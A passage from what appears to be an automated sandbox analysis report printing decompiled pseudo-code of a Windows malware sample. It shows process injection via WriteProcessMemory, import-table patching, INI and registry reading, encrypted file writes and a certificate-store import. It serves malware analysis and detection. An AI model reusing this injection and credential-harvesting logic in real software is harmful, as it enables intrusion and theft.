					_t33 = E00415D45( &_v144,  &_v1184,  &_v1184);
					if(_t33 != 0) {
						_t36 = 0x10;
						E0040F369(_t36,  &_v112);
						_t33 = E00415D45( &_v112,  &_v1704,  &_v1184);
						if(_t33 != 0) {
							_t33 = GetFileAttributesW( &_v1704);
							if(_t33 != 0xffffffff) {
								_t42 = 0x11;
								E0040F369(_t42,  &_v60);
								_t44 = 0x12;
								E0040F369(_t44,  &_v84);
								_t46 = 0x13;
								E0040F369(_t46,  &_v20);
								_v5 = 0;
								while(1) {
									_push(_v5 & 0x000000ff);
									_push( &_v60);
									_t68 = 0xa;
									_t71 =  &_v40;
									_t50 = E004111A5( &_v60, _t68, _t71);
									if(_t50 < 1) {
										break;
									}
									_t50 = GetPrivateProfileIntW(_t71,  &_v84, 0xffffffff,  &_v1704);
									_t78 = _t50;
									if(_t78 == 0xffffffff) {
										break;
									}
									_t50 = GetPrivateProfileStringW(_t71,  &_v20, 0,  &_v664, 0x104,  &_v1704);
									if(_t50 == 0) {
										L17:
										_v5 = _v5 + 1;
										if(_v5 < 0xfa) {
											continue;
										}
										break;
									}
									_t58 =  &_v664;
									if(_v664 == 0) {
										L12:
										if(_t78 != 1) {
											_t66 =  &_v664;
											L16:
											_t50 = E0040A5CD(0, _t66, _a4, _t91);
											if(_t50 == 0) {
												break;
											}
											goto L17;
										}
										_t50 = E00415D45( &_v664,  &_v2224,  &_v1184);
										_t91 = _t50;
										if(_t50 == 0) {
											goto L17;
										}
										_t66 =  &_v2224;
										goto L16;
									} else {
										goto L9;
									}
									do {
										L9:
										if( *_t58 == 0x2f) {
											_t67 = 0x5c;
											 *_t58 = _t67;
										}
										_t58 = _t58 + 2;
									} while ( *_t58 != 0);
									goto L12;
								}
								return _t50;
							}
						}
					}
				}
				return _t33;
			}






























            0x0040a45a
            0x0040a45b
            0x0040a460
            0x0040a46e
            0x0040a476
            0x0040a486
            0x0040a48d
            0x0040a498
            0x0040a499
            0x0040a4ae
            0x0040a4b5
            0x0040a4c2
            0x0040a4cb
            0x0040a4d6
            0x0040a4d7
            0x0040a4e1
            0x0040a4e2
            0x0040a4ec
            0x0040a4ed
            0x0040a4f2
            0x0040a4f6
            0x0040a4fa
            0x0040a4fe
            0x0040a501
            0x0040a502
            0x0040a505
            0x0040a50f
            0x00000000
            0x00000000
            0x0040a525
            0x0040a52b
            0x0040a530
            0x00000000
            0x00000000
            0x0040a551
            0x0040a559
            0x0040a5b9
            0x0040a5b9
            0x0040a5c0
            0x00000000
            0x00000000
            0x00000000
            0x0040a5c0
            0x0040a55b
            0x0040a568
            0x0040a57d
            0x0040a580
            0x0040a5a7
            0x0040a5ad
            0x0040a5b0
            0x0040a5b7
            0x00000000
            0x00000000
            0x00000000
            0x0040a5b7
            0x0040a596
            0x0040a59b
            0x0040a59d
            0x00000000
            0x00000000
            0x0040a59f
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0040a56a
            0x0040a56a
            0x0040a56e
            0x0040a572
            0x0040a573
            0x0040a573
            0x0040a577
            0x0040a578
            0x00000000
            0x0040a56a
            0x00000000
            0x0040a5c6
            0x0040a4cb
            0x0040a4b5
            0x0040a48d
            0x0040a5ca

            APIs
            • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,00000000), ref: 0040A46E
              • Part of subcall function 00415D45: PathCombineW.SHLWAPI(?,?,004014A8,004038F5,?,?,?,00000000), ref: 00415D65
            • GetFileAttributesW.KERNEL32(?,?,?,?,?), ref: 0040A4C2
            • GetPrivateProfileIntW.KERNEL32(?,?,000000FF,?), ref: 0040A525
            • GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,00000104,?), ref: 0040A551
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: PathPrivateProfile$AttributesCombineFileFolderString
            • String ID:
            • API String ID: 1702184609-0
            • Opcode ID: 03964ea05859b73fd404d36eef7cc1f024691935e78eb04a3fc820b37fc215cd
            • Instruction ID: eeff6a2648988d6c1ea58f5d368f08aa76d6875b6fca1a9b45307ab9f261ce8f
            • Opcode Fuzzy Hash: 03964ea05859b73fd404d36eef7cc1f024691935e78eb04a3fc820b37fc215cd
            • Instruction Fuzzy Hash: DC41AE72A00218AEDF20EBA4DC44ADE77BCAB05314F4081B7F654F71C0D7789E898B59
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00406290 Relevance: 6.1, APIs: 4, Instructions: 127memoryCOMMON
            Download Yara Rule
            C-Code - Quality: 97%
            			E00406290(signed int __eax, void* __ecx, void* __edx, signed int _a4, char _a8) {
				void* _v8;
				intOrPtr _v12;
				void* _t39;
				intOrPtr _t46;
				intOrPtr* _t47;
				intOrPtr _t48;
				intOrPtr* _t50;
				char _t52;
				char* _t55;
				signed int _t57;
				void* _t62;
				intOrPtr* _t65;
				intOrPtr _t66;
				intOrPtr* _t67;
				void* _t68;
				intOrPtr* _t69;
				void* _t71;
				intOrPtr _t73;
				intOrPtr _t74;
				intOrPtr _t78;
				void* _t79;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t90;

				_t68 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t57 = __eax;
				_t62 = 0;
				if(__eax <= 0) {
					L4:
					_t71 = VirtualAllocEx(0xffffffff, 0, _t57 * 0x23, 0x3000, 0x40);
					if(_t71 == 0) {
						L35:
						_t39 = 0;
						__eflags = 0;
						L36:
						L37:
						return _t39;
					}
					if(_a8 != 0) {
						ResetEvent( *0x41a500);
					}
					_v8 = 0;
					if(_t57 <= 0) {
						L11:
						if(_v8 != _t57) {
							E004061F8(_t57, _a4);
							__eflags = _a8;
							if(_a8 != 0) {
								SetEvent( *0x41a500);
							}
							goto L35;
						}
						if(_t57 <= 0) {
							L30:
							if(_a8 != 0) {
								SetEvent( *0x41a500);
							}
							_t39 = 1;
							goto L36;
						}
						_t69 = _a4;
						_a4 = _t57;
						do {
							_v12 =  *((intOrPtr*)(_t69 + 8));
							_v8 =  *_t69;
							_t46 =  *0x41a2a4; // 0x400000
							_t19 = _t46 + 0x3c; // 0xd0
							_t65 =  *_t19 + _t46 + 0x80;
							_t78 =  *_t65;
							_t73 = _t46;
							if(_t78 <= 0 ||  *((intOrPtr*)(_t65 + 4)) <= 0x14) {
								L25:
								_t74 =  *((intOrPtr*)(_t69 + 8));
								_t66 =  *_t69;
								_t79 = 0;
								do {
									_t29 = _t79 + 0x41a2b0; // 0x41a2b0
									_t47 = _t29;
									if( *_t47 == _t66) {
										 *_t47 = _t74;
									}
									_t79 = _t79 + 4;
								} while (_t79 < 0x18);
							} else {
								_t67 = _t78 + _t46;
								while(1) {
									_t48 =  *_t67;
									if(_t48 == 0) {
										goto L25;
									}
									_t80 = _t48 + _t73;
									_t50 =  *((intOrPtr*)(_t67 + 0x10)) + _t73;
									while(1) {
										__eflags =  *_t80;
										if( *_t80 == 0) {
											break;
										}
										__eflags = _v8 -  *_t50;
										if(_v8 ==  *_t50) {
											 *_t50 = _v12;
										}
										_t80 = _t80 + 4;
										_t50 = _t50 + 4;
										__eflags = _t50;
									}
									_t67 = _t67 + 0x14;
									__eflags = _t67;
								}
								goto L25;
							}
							_t69 = _t69 + 0x10;
							_t30 =  &_a4;
							 *_t30 = _a4 - 1;
						} while ( *_t30 != 0);
						goto L30;
					} else {
						_t82 = _a4 + 8;
						_t90 = _t82;
						while(1) {
							_t52 = E00414D4A( *((intOrPtr*)(_t82 - 4)), _t62, _t68, _t90,  *((intOrPtr*)(_t82 - 8)), _t71);
							if(_t52 == 0) {
								goto L11;
							}
							 *_t82 = _t71;
							_t71 = _t71 + _t52;
							_v8 = _v8 + 1;
							 *((char*)(_t82 + 4)) = _t52;
							_t82 = _t82 + 0x10;
							if(_v8 < _t57) {
								continue;
							}
							goto L11;
						}
						goto L11;
					}
				}
				_t55 = _a4 + 0xc;
				while( *((intOrPtr*)(_t55 - 0xc)) != 0) {
					 *((intOrPtr*)(_t55 - 4)) = 0;
					 *_t55 = 0;
					_t62 = _t62 + 1;
					_t55 = _t55 + 0x10;
					if(_t62 < _t57) {
						continue;
					}
					goto L4;
				}
				_t39 = 0;
				goto L37;
			}



























            0x00406290
            0x00406293
            0x00406294
            0x00406297
            0x0040629b
            0x0040629f
            0x004062be
            0x004062d5
            0x004062d9
            0x004063ee
            0x004063ee
            0x004063ee
            0x004063f0
            0x004063f1
            0x004063f4
            0x004063f4
            0x004062e3
            0x004062eb
            0x004062eb
            0x004062f1
            0x004062f6
            0x00406320
            0x00406323
            0x004063d7
            0x004063dc
            0x004063e0
            0x004063e8
            0x004063e8
            0x00000000
            0x004063e0
            0x0040632b
            0x004063bc
            0x004063c0
            0x004063c8
            0x004063c8
            0x004063ce
            0x00000000
            0x004063ce
            0x00406331
            0x00406334
            0x00406337
            0x0040633a
            0x0040633f
            0x00406342
            0x00406347
            0x0040634a
            0x00406351
            0x00406353
            0x00406357
            0x00406395
            0x00406395
            0x00406398
            0x0040639a
            0x0040639c
            0x0040639c
            0x0040639c
            0x004063a4
            0x004063a6
            0x004063a6
            0x004063a8
            0x004063ab
            0x0040635f
            0x0040635f
            0x0040638f
            0x0040638f
            0x00406393
            0x00000000
            0x00000000
            0x0040636b
            0x00406371
            0x00406387
            0x00406387
            0x0040638a
            0x00000000
            0x00000000
            0x00406378
            0x0040637a
            0x0040637f
            0x0040637f
            0x00406381
            0x00406384
            0x00406384
            0x00406384
            0x0040638c
            0x0040638c
            0x0040638c
            0x00000000
            0x0040638f
            0x004063b0
            0x004063b3
            0x004063b3
            0x004063b3
            0x00000000
            0x004062f8
            0x004062fb
            0x004062fb
            0x004062fe
            0x00406305
            0x0040630c
            0x00000000
            0x00000000
            0x0040630e
            0x00406310
            0x00406312
            0x00406315
            0x00406318
            0x0040631e
            0x00000000
            0x00000000
            0x00000000
            0x0040631e
            0x00000000
            0x004062fe
            0x004062f6
            0x004062a4
            0x004062a7
            0x004062b0
            0x004062b3
            0x004062b6
            0x004062b7
            0x004062bc
            0x00000000
            0x00000000
            0x00000000
            0x004062bc
            0x00406364
            0x00000000

            APIs
            • VirtualAllocEx.KERNEL32(000000FF,00000000,00000012,00003000,00000040,00000000,774B9EB0,00000000,?,?,?,004064D9,0041A020,00000001,00403A56), ref: 004062CF
            • ResetEvent.KERNEL32(?,?,?,004064D9,0041A020,00000001,00403A56), ref: 004062EB
            • SetEvent.KERNEL32(?,?,?,004064D9,0041A020,00000001,00403A56), ref: 004063C8
            • SetEvent.KERNEL32(?,?,?,004064D9,0041A020,00000001,00403A56), ref: 004063E8
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Event$AllocResetVirtual
            • String ID:
            • API String ID: 4029583732-0
            • Opcode ID: 79a42644e9800509d00f06282d7b441e0614130ecf4ef545794b25c45a1bef69
            • Instruction ID: 440af4aa5eff8b68ca2e5716a9bd301e804f4625cf3f90e6ec50a552084cd708
            • Opcode Fuzzy Hash: 79a42644e9800509d00f06282d7b441e0614130ecf4ef545794b25c45a1bef69
            • Instruction Fuzzy Hash: 1341AF71900210EFDB25CF14C88469EBBA5FB05314F1680BEEC47AB391D338ADA1CB98
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00403D3B Relevance: 6.1, APIs: 4, Instructions: 89injectionCOMMON
            Download Yara Rule
            C-Code - Quality: 95%
            			E00403D3B(void* __ecx, void* __edi, void* __esi, void* __eflags, void* _a4, void _a8) {
				char _v5;
				void _v12;
				void* _t25;
				void _t26;
				signed int _t29;
				void _t43;
				void* _t53;
				void* _t54;

				_t54 = __esi;
				_t53 = __edi;
				_t25 =  *0x41a2a4; // 0x400000
				_t26 = E00414E5F(_t25, __edi);
				_v12 = _t26;
				if(_t26 != 0) {
					_v5 = 0;
					if(DuplicateHandle(0xffffffff, _a4, __edi,  &_a4, 0, 0, 2) == 0) {
						_v5 = 1;
					}
					_t29 =  *0x41a290; // 0x1
					_push(_t54);
					_a8 = _a8 | _t29 & 0x00000008;
					if(WriteProcessMemory(_t53, 0x41a290 -  *0x41a2a4 + _v12,  &_a8, 4, 0) == 0) {
						_v5 = _v5 + 1;
					}
					if(WriteProcessMemory(_t53, 0x41a2a4 -  *0x41a2a4 + _v12,  &_v12, 4, 0) == 0) {
						_v5 = _v5 + 1;
					}
					if(E00403567(0x41a758, _t53, _v12,  *0x41a758) == 0) {
						_v5 = _v5 + 1;
					}
					if(E00403567(0x41a75c, _t53, _v12,  *0x41a75c) == 0) {
						_v5 = _v5 + 1;
					}
					if(_v5 == 0) {
						_t43 = _v12;
					} else {
						VirtualFreeEx(_t53, _v12, 0, 0x8000);
						goto L1;
					}
				} else {
					L1:
					_t43 = 0;
				}
				return _t43;
			}











            0x00403d3b
            0x00403d3b
            0x00403d40
            0x00403d47
            0x00403d4e
            0x00403d53
            0x00403d68
            0x00403d75
            0x00403d77
            0x00403d77
            0x00403d7b
            0x00403d80
            0x00403d8a
            0x00403daa
            0x00403dac
            0x00403dac
            0x00403dcd
            0x00403dcf
            0x00403dcf
            0x00403de8
            0x00403dea
            0x00403dea
            0x00403e03
            0x00403e05
            0x00403e05
            0x00403e0b
            0x00403e22
            0x00403e0d
            0x00403e17
            0x00000000
            0x00403e17
            0x00403d55
            0x00403d55
            0x00403d55
            0x00403d55
            0x00403e27

            APIs
              • Part of subcall function 00414E5F: IsBadReadPtr.KERNEL32(00400000,?,00000000,?,00000000,?,00000000,?,?,00000000), ref: 00414E7B
            • DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002,00000000,00000000,?,?,?,00404CA7,?,00000000,?), ref: 00403D6D
            • WriteProcessMemory.KERNEL32(00000000,-00000014,?,00000004,00000000,?,?,?,?,00404CA7,?,00000000,?,?,00404E33,?), ref: 00403DA6
            • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000004,00000000,?,?,?,00404CA7,?,00000000,?,?,00404E33,?,?), ref: 00403DC8
            • VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,00000000,?,00000000,?,?,?,00404CA7,?,00000000,?,?,00404E33), ref: 00403E17
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: MemoryProcessWrite$DuplicateFreeHandleReadVirtual
            • String ID:
            • API String ID: 2215616122-0
            • Opcode ID: 901bf7f83de90021b6d78801a68457826e1411dd754014b2c275f0fdf174f5d4
            • Instruction ID: 06437b0e4ecc118571950649d6d0c8a3d71037f44c4b294824d9b647c8a78842
            • Opcode Fuzzy Hash: 901bf7f83de90021b6d78801a68457826e1411dd754014b2c275f0fdf174f5d4
            • Instruction Fuzzy Hash: 14219E71504248BADB019FA4DD80EFE7F7CEF09358F0080AAFA01F6291D33A9B558729
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00416486 Relevance: 6.1, APIs: 4, Instructions: 84fileCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00416486(signed int __edx, void** __esi, void* _a4, signed int _a8) {
				char _v5;
				long _v12;
				void _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _t26;
				signed int _t29;
				signed int _t46;
				void** _t48;

				_t48 = __esi;
				_t46 = __edx;
				_v5 = 0;
				if(_a8 <= 0xa00000) {
					_t26 = E0041583F( *__esi);
					_v36 = _t26;
					_v32 = _t46;
					if((_t26 & _t46) != 0xffffffff && E0041581F( *__esi, 0, 0, 2) != 0) {
						_t29 = E0041583F( *__esi);
						_v28 = _t29;
						_v24 = _t46;
						if((_t29 & _t46) != 0xffffffff) {
							E004104CB( &_v20,  &_v20, 0, 5);
							_v20 = __esi[4] ^ _a8;
							if(WriteFile( *__esi,  &_v20, 5,  &_v12, 0) == 0 || _v12 != 5 || WriteFile( *__esi, _a4, _a8,  &_v12, 0) == 0 || _v12 != _a8) {
								E0041581F( *_t48, _v28, _v24, 0);
								SetEndOfFile( *_t48);
							} else {
								_v5 = 1;
							}
						}
						FlushFileBuffers( *_t48);
						E0041581F( *_t48, _v36, _v32, 0);
					}
				}
				return _v5;
			}














            0x00416486
            0x00416486
            0x00416497
            0x0041649a
            0x004164a2
            0x004164a7
            0x004164ac
            0x004164b2
            0x004164cd
            0x004164d2
            0x004164d7
            0x004164dd
            0x004164e6
            0x004164f8
            0x0041650b
            0x0041653d
            0x00416544
            0x0041652e
            0x0041652e
            0x0041652e
            0x0041650b
            0x0041654c
            0x0041655b
            0x0041655b
            0x004164b2
            0x00416566

            APIs
              • Part of subcall function 0041583F: SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001,?,00000000,00000000), ref: 00415854
              • Part of subcall function 0041581F: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,0041645F,?,00000000,00000000,00000000,00000000), ref: 00415831
            • WriteFile.KERNEL32(?,?,00000005,00000000,00000000,?,00000000,00000005,?,?,00000000,00000000,00000002,?,00000000,00000000), ref: 00416507
            • WriteFile.KERNEL32(?,00000005,00A00000,00000005,00000000), ref: 00416520
            • SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 00416544
            • FlushFileBuffers.KERNEL32(?,?,?,00000000,00000000,00000002,?,00000000,00000000), ref: 0041654C
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: File$PointerWrite$BuffersFlush
            • String ID:
            • API String ID: 1289656144-0
            • Opcode ID: d65ae89fc0887a5cf885015d7e82da30abf875ccc16445155c69be68c20b5184
            • Instruction ID: 8ee1fa0edf91c0ffceb780e2c328f313bc3f79b6c5672d3b62dd76ee25bc7518
            • Opcode Fuzzy Hash: d65ae89fc0887a5cf885015d7e82da30abf875ccc16445155c69be68c20b5184
            • Instruction Fuzzy Hash: 8F314176800108FEDF11AFA4DD81EEEBBBABF04344F11852AF591A1164D33A9995DB24
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00414526 Relevance: 6.1, APIs: 4, Instructions: 69registryCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00414526(void* __ecx, void* _a4, int _a8, short* _a12, int* _a16, char** _a20) {
				int* _v8;
				int _t30;
				char* _t39;

				_v8 = _v8 | 0xffffffff;
				 *_a20 = 0;
				if(RegOpenKeyExW(_a4, _a8, 0, 1,  &_a4) == 0) {
					_a8 = 0;
					if(RegQueryValueExW(_a4, _a12, 0, _a16, 0,  &_a8) == 0) {
						_t30 = _a8;
						if(_t30 != 0) {
							_t31 = _t30 + 4;
							if(_t30 + 4 != 0) {
								_t39 = E004103ED(_t31);
								if(_t39 == 0 || RegQueryValueExW(_a4, _a12, 0, _a16, _t39,  &_a8) != 0) {
									goto L6;
								} else {
									 *_a20 = _t39;
									_v8 = _a8;
									goto L7;
								}
								goto L9;
							} else {
								_t39 = 0;
								L6:
								E00410418(_t39);
							}
							L7:
						} else {
							_v8 = 0;
						}
					}
					RegCloseKey(_a4);
				}
				L9:
				return _v8;
			}






            0x0041452d
            0x00414534
            0x0041454b
            0x0041455c
            0x0041456a
            0x0041456c
            0x00414571
            0x00414578
            0x0041457e
            0x004145a0
            0x004145a4
            0x00000000
            0x004145bb
            0x004145be
            0x004145c3
            0x00000000
            0x004145c3
            0x00000000
            0x00414580
            0x00414580
            0x00414582
            0x00414583
            0x00414583
            0x00414588
            0x00414573
            0x00414573
            0x00414573
            0x00414571
            0x0041458c
            0x00414592
            0x00414593
            0x00414598

            APIs
            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?,0041A8D4,?,?,004060E9,80000001,0041A8F0,0041A8D4,?,00000000,?,?), ref: 00414543
            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,?,0041A8F0,?,?,004060E9,80000001,0041A8F0,0041A8D4,?,00000000), ref: 00414566
            • RegCloseKey.ADVAPI32(?,?,?,004060E9,80000001,0041A8F0,0041A8D4,?,00000000,?,?), ref: 0041458C
            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,?,00000000,?,?,004060E9,80000001,0041A8F0,0041A8D4,?,00000000), ref: 004145B5
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: QueryValue$CloseOpen
            • String ID:
            • API String ID: 1586453840-0
            • Opcode ID: 91f1d17ac7605f1466c6c25126574d36372c29d81d4945ae1c6e528ce94f4bcc
            • Instruction ID: 6989f671629d0f7caa4ac4c80e0f605d7eb74c225a412cda5e40e4e1aaed18b9
            • Opcode Fuzzy Hash: 91f1d17ac7605f1466c6c25126574d36372c29d81d4945ae1c6e528ce94f4bcc
            • Instruction Fuzzy Hash: FF21367110021ABFDF119F96DC80DDE7BADEF487A4B008426FA1596220D375DA919BA4
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0040479B Relevance: 6.0, APIs: 4, Instructions: 45threadsynchronizationCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E0040479B(void* __eflags) {
				void* _t1;
				void* _t2;
				void* _t3;
				long _t6;
				void* _t11;

				_t1 = E00403D00(_t11, __eflags, 0x19367400, 1);
				_t19 = _t1;
				if(_t1 != 0) {
					_t2 = E00403E39();
					__eflags = _t2;
					if(_t2 != 0) {
						SetThreadPriority(GetCurrentThread(), 0xfffffff1);
						_t6 = WaitForSingleObject( *0x41a758, 0x1388);
						while(1) {
							__eflags = _t6 - 0x102;
							if(_t6 != 0x102) {
								goto L6;
							}
							E00404D06();
							_t6 = WaitForSingleObject( *0x41a758, 0x1388);
						}
					}
					L6:
					E00413A4E(_t19);
					_t3 = 0;
					__eflags = 0;
				} else {
					_t3 = _t1 + 1;
				}
				return _t3;
			}








            0x004047ac
            0x004047b1
            0x004047b5
            0x004047ba
            0x004047bf
            0x004047c1
            0x004047cc
            0x004047e4
            0x004047fb
            0x004047fb
            0x004047fd
            0x00000000
            0x00000000
            0x004047ed
            0x004047f9
            0x004047f9
            0x004047fb
            0x004047ff
            0x00404800
            0x00404805
            0x00404805
            0x004047b7
            0x004047b7
            0x004047b7
            0x0040480e

            APIs
              • Part of subcall function 00403D00: CreateMutexW.KERNEL32(0041A2C8,00000000,?,?,?,?,?), ref: 00403D21
            • GetCurrentThread.KERNEL32 ref: 004047C5
            • SetThreadPriority.KERNEL32(00000000), ref: 004047CC
            • WaitForSingleObject.KERNEL32(00001388), ref: 004047E4
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Thread$CreateCurrentMutexObjectPrioritySingleWait
            • String ID:
            • API String ID: 3441234504-0
            • Opcode ID: cefb277c937685d59e69cb7621a9d7660eb2a1ae23493bde164298c4aada1f49
            • Instruction ID: 0381f2cfc366511f4e3e2031ecbc7e247120234e00cdc92cd1439fb03b7b308b
            • Opcode Fuzzy Hash: cefb277c937685d59e69cb7621a9d7660eb2a1ae23493bde164298c4aada1f49
            • Instruction Fuzzy Hash: D6F046B25041082AC6113B61AC04DAB3B8CCB86365B100237FA10F32E2DE798D0151BD
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004139F3 Relevance: 6.0, APIs: 4, Instructions: 40windowCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E004139F3(HANDLE* _a4) {
				struct tagMSG _v28;
				long _t5;

				while(1) {
					_t5 = MsgWaitForMultipleObjects(1, _a4, 0, 0xffffffff, 0x4bf);
					if(_t5 != 1) {
						break;
					}
					while(PeekMessageW( &_v28, 0, 0, 0, 1) != 0) {
						TranslateMessage( &_v28);
						DispatchMessageW( &_v28);
					}
				}
				return _t5;
			}





            0x00413a35
            0x00413a3e
            0x00413a42
            0x00000000
            0x00000000
            0x00413a22
            0x00413a11
            0x00413a1c
            0x00413a1c
            0x00413a22
            0x00413a4b

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: MessageMultipleObjectsPeekWait
            • String ID:
            • API String ID: 3986374578-0
            • Opcode ID: 9b4ede3eabaa2c88267c43d3d158c22044a4909bde63cdc3dc8fccb5edfd2d8e
            • Instruction ID: a1d2323d88ffdfb6c30e1258e959ae11c6308d85b97c6630029b8f1318df6d2b
            • Opcode Fuzzy Hash: 9b4ede3eabaa2c88267c43d3d158c22044a4909bde63cdc3dc8fccb5edfd2d8e
            • Instruction Fuzzy Hash: 85F0B47250424D7FD700EF95DC88CA77BACFB453A9B04057EF650E2021D239D9084779
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00411A8A Relevance: 6.0, APIs: 4, Instructions: 36threadprocessCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00411A8A(intOrPtr _a4) {
				intOrPtr _v20;
				void* _v32;
				signed int _t6;
				signed int _t7;
				int _t9;
				int _t14;
				void* _t15;

				_t14 = 0;
				_t6 = CreateToolhelp32Snapshot(4, 0);
				_t15 = _t6;
				_t7 = _t6 | 0xffffffff;
				if(_t15 != _t7) {
					_v32 = 0x1c;
					_t9 = Thread32First(_t15,  &_v32);
					while(_t9 != 0) {
						if(_v20 == _a4) {
							_t14 = _t14 + 1;
						}
						_t9 = Thread32Next(_t15,  &_v32);
					}
					CloseHandle(_t15);
					return _t14;
				}
				return _t7;
			}










            0x00411a92
            0x00411a97
            0x00411a9c
            0x00411a9e
            0x00411aa3
            0x00411aaa
            0x00411ab1
            0x00411acb
            0x00411abe
            0x00411ac0
            0x00411ac0
            0x00411ac6
            0x00411ac6
            0x00411ad0
            0x00000000
            0x00411ad6
            0x00411adb

            APIs
            • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00411A97
            • Thread32First.KERNEL32 ref: 00411AB1
            • Thread32Next.KERNEL32 ref: 00411AC6
            • CloseHandle.KERNEL32(00000000,00000000,0000001C,00000000,?,00000004,00000000,?), ref: 00411AD0
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Thread32$CloseCreateFirstHandleNextSnapshotToolhelp32
            • String ID:
            • API String ID: 3643885135-0
            • Opcode ID: dd5aaa719eabed4c0d8e366c8073e18c46a89d2ee709b4e996d9339e0cc85680
            • Instruction ID: 76cf46a3d10d727609dafb8d14dacd50e79e5502b1b5babddc7362bfc74ace96
            • Opcode Fuzzy Hash: dd5aaa719eabed4c0d8e366c8073e18c46a89d2ee709b4e996d9339e0cc85680
            • Instruction Fuzzy Hash: EDF0AE719011156ADB20BFAB8C45EEF7BECDFC1394F014523FA11D2191D638E98286BD
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0040A1AD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 102timeCOMMON
            Download Yara Rule
            C-Code - Quality: 62%
            			E0040A1AD(void* __ecx, intOrPtr* _a4, intOrPtr* _a8, signed int _a12) {
				char _v536;
				char _v600;
				char _v728;
				char _v744;
				struct _SYSTEMTIME _v760;
				intOrPtr _v764;
				intOrPtr _v772;
				intOrPtr _v776;
				char _v784;
				void* __edi;
				void* __esi;
				intOrPtr _t31;
				void* _t47;
				void* _t58;
				intOrPtr* _t59;
				void* _t61;
				void* _t65;
				intOrPtr* _t66;
				void* _t67;
				void* _t71;
				char* _t74;
				signed int _t76;
				void* _t78;
				void* _t79;

				_t61 = __ecx;
				_t78 = (_t76 & 0xfffffff8) - 0x2fc;
				_t31 = E00403E2A();
				_t59 = _a4;
				__imp__PFXImportCertStore(_t59, _a8, _a12, _t67, _t71, _t58);
				_v776 = _t31;
